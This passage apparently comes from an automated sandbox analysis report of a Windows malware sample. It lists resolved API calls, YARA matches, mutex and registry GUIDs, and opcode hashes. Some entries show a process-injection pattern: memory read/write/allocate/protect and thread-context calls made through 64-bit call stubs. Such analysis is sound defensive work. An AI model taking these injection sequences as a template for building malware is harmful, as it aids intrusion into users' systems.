                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocAttributesFile__snwprintf$FolderKnownPathTasklstrlen
                                                                            • String ID:
                                                                            • API String ID: 1889006086-0
                                                                            APIs
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event
                                                                            • String ID:
                                                                            • API String ID: 4201588131-0
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007DBBFD), ref: 007C4217
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007DBBFD), ref: 007C4233
                                                                            • CreateThread.KERNEL32(00000000,00000000,007C4320,00000000,00000000,00000000), ref: 007C4256
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBBFD), ref: 007C4277
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBBFD), ref: 007C428E
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$CloseEventHandle$Thread
                                                                            • String ID:
                                                                            • API String ID: 3315681087-0
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 007E92E8
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E92FF
                                                                            • __amsg_exit.LIBCMT ref: 007E930D
                                                                            • __lock.LIBCMT ref: 007E931D
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 007E9331
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 007DC978
                                                                            • CoCreateGuid.COMBASE(?), ref: 007DC982
                                                                            • StringFromGUID2.COMBASE(?,?,00000027), ref: 007DC996
                                                                            • CoUninitialize.COMBASE ref: 007DC9A0
                                                                            • CoUninitialize.COMBASE ref: 007DC9AD
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Uninitialize$CreateFromGuidInitializeString
                                                                            • String ID:
                                                                            • API String ID: 46189592-0
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$MutexRelease
                                                                            • String ID:
                                                                            • API String ID: 2279609368-0
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtReadVirtualMemory), ref: 007C64D4
                                                                            • X64Call.FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 007C6554
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6576
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtReadVirtualMemory
                                                                            • API String ID: 3570319994-2166501906
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtWriteVirtualMemory), ref: 007C65C4
                                                                            • X64Call.FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 007C6644
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6666
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtWriteVirtualMemory
                                                                            • API String ID: 3570319994-3834091833
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtAllocateVirtualMemory), ref: 007C6254
                                                                            • X64Call.FILE(00000000,00000000,00000006,?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 007C62CE
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C62F0
                                                                            Strings
                                                                            • NtAllocateVirtualMemory, xrefs: 007C6248
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtAllocateVirtualMemory
                                                                            • API String ID: 3570319994-3765841899
                                                                            • Opcode ID: 76349990504a2998754788bf23f79193185d139e553e2e3a4b89e285e0a61849
                                                                            • Instruction ID: d0b0a5048470253c64db9fe5f2715ac50fb891d2e92ab46a97e258bd6980259c
                                                                            • Opcode Fuzzy Hash: 76349990504a2998754788bf23f79193185d139e553e2e3a4b89e285e0a61849
                                                                            • Instruction Fuzzy Hash: 91211DB1E00209EFDB14DFA4DD46F7BB7B9FB88710F40852DE404A7244E7785A448B90
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtProtectVirtualMemory), ref: 007C6404
                                                                            • X64Call.FILE(00000000,00000000,00000005,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 007C6475
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtProtectVirtualMemory
                                                                            • API String ID: 3570319994-1546459799
                                                                            • Opcode ID: 049e91ac863ddb2f74e8d12009f9ce4ccc2c47c0d5c28bbc9ad49d356574e380
                                                                            • Instruction ID: b6352e0a5fea8bfafc39717644692b77fa3cb1ad6477f03696760f20b482065a
                                                                            • Opcode Fuzzy Hash: 049e91ac863ddb2f74e8d12009f9ce4ccc2c47c0d5c28bbc9ad49d356574e380
                                                                            • Instruction Fuzzy Hash: 2221FCB0D10209AFDB18DF64EC46FBAB7F9FB88714F00852DE405A6251E7799A90CB64
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtFreeVirtualMemory), ref: 007C6334
                                                                            • X64Call.FILE(00000000,00000000,00000004,?,?,?,00000000,?,00000000,?,00000000), ref: 007C639F
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C63C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtFreeVirtualMemory
                                                                            • API String ID: 3570319994-3923168862
                                                                            • Opcode ID: c018e92e0a8a3e0cb80e4fb47c86aa9a4c140e43979e5d1b86d633e89bf89d61
                                                                            • Instruction ID: 6ffa067fecd87cbecf0a9220610a82b3c6e470b61659f8bc422b589c1a792331
                                                                            • Opcode Fuzzy Hash: c018e92e0a8a3e0cb80e4fb47c86aa9a4c140e43979e5d1b86d633e89bf89d61
                                                                            • Instruction Fuzzy Hash: A5212CB1D00248EFDB14DF64DC86FBAB7F9FB88310F00892DE505A7250E6795984CBA1
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtQueryVirtualMemory), ref: 007C6184
                                                                            • X64Call.FILE(00000000,00000000,00000006,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C61F1
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6213
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtQueryVirtualMemory
                                                                            • API String ID: 3570319994-66515852
                                                                            • Opcode ID: 1284652d45f3b70e0d088b41542c7e76531d85e2b10b150b40d75080ab5efc10
                                                                            • Instruction ID: 6c52253f232a30dbaf2de9664f6cb59fe6aab6e4ac35a2cef09b149f9c185be0
                                                                            • Opcode Fuzzy Hash: 1284652d45f3b70e0d088b41542c7e76531d85e2b10b150b40d75080ab5efc10
                                                                            • Instruction Fuzzy Hash: BF211DB1D14208EFEB14DF98DC86F7AB7B9FB84715F00841CF804A6291E77999808B61
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtGetContextThread), ref: 007C66B4
                                                                            • X64Call.FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 007C66F9
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C671B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtGetContextThread
                                                                            • API String ID: 3570319994-3545450881
                                                                            • Opcode ID: 175cad641ff95aa1613027ac19d3c2d93f6e3e796c64fd455bb8ed0112a2ce98
                                                                            • Instruction ID: d0bbf88174ec1e35060d4abaaeecb8580f81964b5d523c34e403cb0ba9fade50
                                                                            • Opcode Fuzzy Hash: 175cad641ff95aa1613027ac19d3c2d93f6e3e796c64fd455bb8ed0112a2ce98
                                                                            • Instruction Fuzzy Hash: E41161B5900208EFEB10EF74EC8AF69B7B8FB84315F10882DE905B6191E27959D0CF61
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtSetContextThread), ref: 007C6764
                                                                            • X64Call.FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 007C67A9
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C67CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtSetContextThread
                                                                            • API String ID: 3570319994-3779410840
                                                                            • Opcode ID: 1155f587df4307f0467971020d2c789452f81509ab0dd4b7a2c108c2f94b13b8
                                                                            • Instruction ID: 88cbffc3ac22440c119917b8e2241daf9e6285669db94e43a85d18937925fa53
                                                                            • Opcode Fuzzy Hash: 1155f587df4307f0467971020d2c789452f81509ab0dd4b7a2c108c2f94b13b8
                                                                            • Instruction Fuzzy Hash: 4A118BB4900308EFDB10DFB4ED8AF69B3F8B788728F00492CE505A6241E3785D84AB20
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wcscat$FreeLocal__snwprintf
                                                                            • String ID: '%s'
                                                                            • API String ID: 3523142645-2201965518
                                                                            • Opcode ID: 88e070e171a2458baaa326da3059524500842fc2917b86a1527ea352c2880568
                                                                            • Instruction ID: b1fe80b979f6be4be71420e43b3f82f28a94aaf2930f9ed4ecc0609a51d954fd
                                                                            • Opcode Fuzzy Hash: 88e070e171a2458baaa326da3059524500842fc2917b86a1527ea352c2880568
                                                                            • Instruction Fuzzy Hash: 0C1139B094011CEBDB24DB40CCCDBEDB775AB64308F208299E1096B295D778AFC48B90
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007C471F
                                                                            • RegGetValueW.ADVAPI32(80000001,?,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000008,00000000,?,?), ref: 007C4750
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value__snwprintf
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 3635966236-3800169908
                                                                            • Opcode ID: 4accfba26a17fbf1fb149999b1813bc30be4110ae2b6291ee3f2f6e1b09f5b27
                                                                            • Instruction ID: d961c95ef931937d89b885ed7c1347826c776992416a9e3dda9dc4f9f815adf6
                                                                            • Opcode Fuzzy Hash: 4accfba26a17fbf1fb149999b1813bc30be4110ae2b6291ee3f2f6e1b09f5b27
                                                                            • Instruction Fuzzy Hash: 1BF0AE71A40718FBD710DA65DC4AFE6B368EB84B01F004598BE19A6280F6F499544BD4
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D0190
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D01A3
                                                                            • Sleep.KERNEL32(00000064), ref: 007D01AB
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D0184
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleMutexOpenSleep
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2969294566-1719058712
                                                                            • Opcode ID: 4ddf9884a023d4941086b9cda5a2bc642321a54e49f6009070ef2e7d03cebae9
                                                                            • Instruction ID: 0988ee18b91f9b9795242fd94edd1efee4a446dc73b059bf5b6793fbef51961f
                                                                            • Opcode Fuzzy Hash: 4ddf9884a023d4941086b9cda5a2bc642321a54e49f6009070ef2e7d03cebae9
                                                                            • Instruction Fuzzy Hash: 7CE0B670A45309DBE714EBA0CE0DBAD7E70BB84745F201926B502B53D0C7BA8A00CBA2
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D0264
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D0277
                                                                            • Sleep.KERNEL32(00000064), ref: 007D027F
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D0290
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D0258
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 2d15205e57dc88d0a58b4fff24cb203f8a5a215825e58d2a2a1d842160d2b3ba
                                                                            • Instruction ID: cde4d1dfc579d0fd40abee8a2a918f0abaee3de03aa478d470cbb75bd89e15f5
                                                                            • Opcode Fuzzy Hash: 2d15205e57dc88d0a58b4fff24cb203f8a5a215825e58d2a2a1d842160d2b3ba
                                                                            • Instruction Fuzzy Hash: A5E0B675A41304DBEB54ABA0C84DBDD7A71FB58715F286425F102B52D4CBBCA481CBA8
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D0343
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D0356
                                                                            • Sleep.KERNEL32(00000064), ref: 007D035E
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D036F
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D0337
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 61e5a58b2a614c5e9e1aafdd3188d0ead1ee08e6b45e632f43b02a1a35907df8
                                                                            • Instruction ID: ea81548c43d3bee85df30e10522309ab4844b861dfe4c2e584abb54564315da3
                                                                            • Opcode Fuzzy Hash: 61e5a58b2a614c5e9e1aafdd3188d0ead1ee08e6b45e632f43b02a1a35907df8
                                                                            • Instruction Fuzzy Hash: 39E0B635A40304EBEB18ABA1E8597AD7A71FB44B01F50942DF112A52E4CFBC8401CF45
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D03B0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D03C3
                                                                            • Sleep.KERNEL32(00000064), ref: 007D03CB
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D03DC
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D03A4
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 5eec0a0673eaf5029d6f9c31781636104119ee307a5c6e2930922db4b7a26ab0
                                                                            • Instruction ID: bbaabc9b6366333db29708e9664b5b869dae6bdb081ec0934be908acd261f6f4
                                                                            • Opcode Fuzzy Hash: 5eec0a0673eaf5029d6f9c31781636104119ee307a5c6e2930922db4b7a26ab0
                                                                            • Instruction Fuzzy Hash: F3E0EC31A44314DBEB24AFA0DC0DBAD7A71BB44705F145429F102B52D4CBFD8802CB55
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00009004), ref: 007DCC9D
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007DCCB7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCCEB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD02
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD0C
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 3098330729-0
                                                                            • Opcode ID: a13cea58707b1ca68227342086298fd3fa9b8ba20452e39ed00f0662890adc13
                                                                            • Instruction ID: 55f02124d54f233fb8d40a815990d53270f99ed6e0a9f8eded62a1783083c8bc
                                                                            • Opcode Fuzzy Hash: a13cea58707b1ca68227342086298fd3fa9b8ba20452e39ed00f0662890adc13
                                                                            • Instruction Fuzzy Hash: 8A110C75A00208FFDB05EFA8D849BAD7BB5FB48300F108599FA05A7391D6389A41DF58
                                                                            APIs
                                                                              • Part of subcall function 007DEBC0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007DEC09
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007DE3F8
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocFreeLocalVirtual
                                                                            • String ID:
                                                                            • API String ID: 3333721195-0
                                                                            • Opcode ID: f0c7de8daa9e2c345c8034735aea8ccbf5e7632efb6290a9e818064b057fd548
                                                                            • Instruction ID: 05a4a7ce72de3df0955e0ba7d18c5c973733dd7642d0d836b0901db93744f787
                                                                            • Opcode Fuzzy Hash: f0c7de8daa9e2c345c8034735aea8ccbf5e7632efb6290a9e818064b057fd548
                                                                            • Instruction Fuzzy Hash: BF91A474E00209DFCB15DF98C984AADFBB2FF48304F24855AE816AB355D738A992CF54
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007EC277
                                                                            • __isleadbyte_l.LIBCMT ref: 007EC2AA
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 007EC2DB
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 007EC349
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 15450cfd3c457239c7c3f9129fe328e4f020f27659d77db1e5b7ce2a962a2c33
                                                                            • Instruction ID: 4a7f213758d97a6be1f62860fc48f1d975b69563f49de8778bcee1c4f19038b0
                                                                            • Opcode Fuzzy Hash: 15450cfd3c457239c7c3f9129fe328e4f020f27659d77db1e5b7ce2a962a2c33
                                                                            • Instruction Fuzzy Hash: 9F312534A062C9EFCB22CFA6C8849BD7BA8BF09310F1485A8F5A09B191D334CD42DB51
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E1E06
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E1E2A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1E4C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1E6E
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
